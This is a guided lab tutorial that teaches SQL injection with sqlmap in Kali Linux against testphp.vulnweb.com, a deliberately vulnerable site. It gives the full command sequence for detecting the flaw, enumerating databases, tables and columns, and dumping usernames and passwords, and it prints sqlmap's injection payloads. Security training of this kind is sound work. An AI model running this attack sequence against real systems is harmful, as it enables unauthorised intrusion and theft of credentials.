Kali SQL Injection with sqlmap

Introduction

In this lab, you will learn how to identify and exploit SQL injection vulnerabilities using Kali Linux and the powerful tool sqlmap. Through a series of guided steps, you will detect a vulnerable web application, enumerate its database structure, and extract sensitive data. All activities are conducted within a secure LabEx VM environment using a Kali Linux container. This lab is designed for beginners, providing hands-on experience in automated web application security testing. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to begin.

This is a Guided Lab, which provides step-by-step instructions to help you learn and practice. Follow the instructions carefully to complete each step and gain hands-on experience. Historical data shows that this is a intermediate level lab with a 60% completion rate. It has received a 97% positive review rate from learners.

Setting Up the Environment and Installing sqlmap

Your lab environment is pre-configured to automatically place you inside a Kali Linux container shell when you open the terminal. Your first task is to prepare this environment by updating its package list and installing sqlmap, the primary tool for this lab.

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

First, update the package repository index. This ensures you can fetch the latest version of the software.

apt update

Next, install sqlmap using the following command. The -y flag automatically confirms the installation.

apt install -y sqlmap

This process may take a few moments. Once the installation is complete, verify that sqlmap is installed correctly by checking its version.

sqlmap --version

You should see output displaying the installed version of sqlmap, which confirms that the tool is ready for use.

Expected Output (version number may vary):

1.x.x#stable

With sqlmap installed and verified, your environment is now prepared for the next steps, where you will begin testing for SQL injection vulnerabilities on a target web application.

Detecting a SQL Injection Vulnerability

Now that sqlmap is installed, you can begin testing a web application for SQL injection vulnerabilities. For this lab, we will use a publicly available, intentionally vulnerable website designed for security testing. The first step in any SQL injection attack is to identify a vulnerable parameter.

The target URL for this lab is http://testphp.vulnweb.com/listproducts.php?cat=1. The parameter cat=1 is a potential entry point for injection. We will use sqlmap to automatically test this parameter.

Run the following command to start the test. The -u flag specifies the target URL. We use the --batch flag to let sqlmap run with its default answers to any interactive questions, making the process non-interactive and faster.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --batch

sqlmap will perform a series of tests against the URL. It will analyze the responses to determine if the cat parameter is injectable. This process can take a minute or two as it tries various SQL injection techniques.

After the scan completes, review the output. You should find a section that confirms the vulnerability.

Expected Output (truncated):

---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7125=7125

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x71786a6a71,(SELECT (ELT(8227=8227,1))),0x716a627071),8227)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 7601 FROM (SELECT(SLEEP(5)))jbZM)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x4a484f686a79456477714b47526758645944704b4645674b784a76507569597a494170424a766642,0x716a627071),NULL,NULL,NULL,NULL-- -
---
[HH:MM:SS] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[HH:MM:SS] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

The output confirms that the cat parameter is vulnerable to multiple types of SQL injection attacks:

Boolean-based blind: Uses true/false logic to extract data
Error-based: Exploits database error messages to reveal information
Time-based blind: Uses delays in responses to confirm injection
UNION query: Combines results from multiple SELECT statements

The scan also identifies the backend database as MySQL version 5.6 or higher, running on a Linux Ubuntu system with Nginx and PHP. This detailed fingerprinting information guides the next steps in the exploitation process.

Enumerating Databases

With the vulnerability confirmed, the next logical step is to discover what databases exist on the server. This process is called database enumeration. Knowing the database names is essential for navigating the server's data structure.

You will use the --dbs flag with sqlmap to list all available databases. The command reuses the session data from the previous step, so sqlmap does not need to re-verify the vulnerability.

Run the following command:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batch

sqlmap will exploit the vulnerability to query the database schema and retrieve a list of all database names. Notice that sqlmap resumes from the stored session, so it doesn't need to re-test the vulnerability.

Expected Output:

[HH:MM:SS] [INFO] resuming back-end DBMS 'mysql'
[HH:MM:SS] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7125=7125

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x71786a6a71,(SELECT (ELT(8227=8227,1))),0x716a627071),8227)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 7601 FROM (SELECT(SLEEP(5)))jbZM)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a6a71,0x4a484f686a79456477714b47526758645944704b4645674b784a76507569597a494170424a766642,0x716a627071),NULL,NULL,NULL,NULL-- -
---
[HH:MM:SS] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[HH:MM:SS] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[HH:MM:SS] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

The output shows two databases: acuart and information_schema.

information_schema is a standard database in MySQL that stores metadata about all other databases. It's useful but typically not the primary target for data theft.
acuart appears to be a custom application database, which is likely to contain the interesting data we are looking for, such as user information or application data.

Now that you have the name of the application's database, you can proceed to inspect its contents.

Enumerating Tables and Columns

After identifying the acuart database, your next goal is to see what tables it contains. Tables are where the actual data is stored. A table named users or customers, for example, is a high-value target.

To list the tables in the acuart database, use the -D flag to specify the database name and the --tables flag to request the table list.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables --batch

Expected Output:

[HH:MM:SS] [INFO] resuming back-end DBMS 'mysql'
[HH:MM:SS] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7125=7125
---
[HH:MM:SS] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[HH:MM:SS] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[HH:MM:SS] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

The output reveals several tables, with users being a particularly interesting one. Let's investigate the users table further by listing its columns. To do this, add the -T flag to specify the table name and the --columns flag.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns --batch

Expected Output:

[HH:MM:SS] [INFO] resuming back-end DBMS 'mysql'
[HH:MM:SS] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7125=7125
---
[HH:MM:SS] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[HH:MM:SS] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[HH:MM:SS] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

The columns uname (username) and pass (password) are prime targets for data extraction. Other interesting columns include email, cc (credit card), and phone for customer information. You now have all the information needed to dump the contents of these sensitive columns.

Dumping Data from a Table

This is the final step of the attack, where you will extract the data from the target table. Based on the previous steps, you know the database (acuart), the table (users), and the columns of interest (uname, pass).

To dump the data, you will use the --dump flag. You can specify which columns to dump using the -C flag to make the process faster and more focused.

Run the following command to dump the usernames and passwords from the users table:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C "uname,pass" --dump --batch

sqlmap will now extract the data from the specified columns and display it in the terminal. It will also save the data to a CSV file for later analysis.

Expected Output:

[HH:MM:SS] [INFO] resuming back-end DBMS 'mysql'
[HH:MM:SS] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7125=7125
---
[HH:MM:SS] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.6
[HH:MM:SS] [INFO] fetching entries of column(s) 'pass,uname' for table 'users' in database 'acuart'
Database: acuart
Table: users
[1 entry]
+-------+------+
| uname | pass |
+-------+------+
| test  | test |
+-------+------+

[HH:MM:SS] [INFO] table 'acuart.users' dumped to CSV file '/root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[HH:MM:SS] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

The output shows one user entry with the username test and password test. This successful data extraction demonstrates the critical impact of SQL injection vulnerabilities:

Data Breach: Sensitive user credentials are exposed
Unauthorized Access: These credentials could be used to login to the application
Privacy Violation: Personal information is compromised
Security Risk: The vulnerability could be exploited to access other data or escalate privileges

This completes a typical SQL injection attack sequence: detection → enumeration → exploitation → data extraction.

You can also view the saved data by reading the CSV file mentioned in the output.

cat /root/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv

Expected Output:

uname,pass
test,test

This confirms that the data has been successfully exfiltrated and saved.

Summary

In this lab, you have successfully performed an end-to-end SQL injection attack using sqlmap in a Kali Linux environment. You started by installing sqlmap and then used it to automatically detect a vulnerability in a live web application. Following a systematic approach, you enumerated the server's databases, listed the tables within a target database, identified sensitive columns, and finally dumped user credentials. This hands-on experience has provided you with a practical understanding of how automated tools can be used to find and exploit one of the most common and critical web security flaws.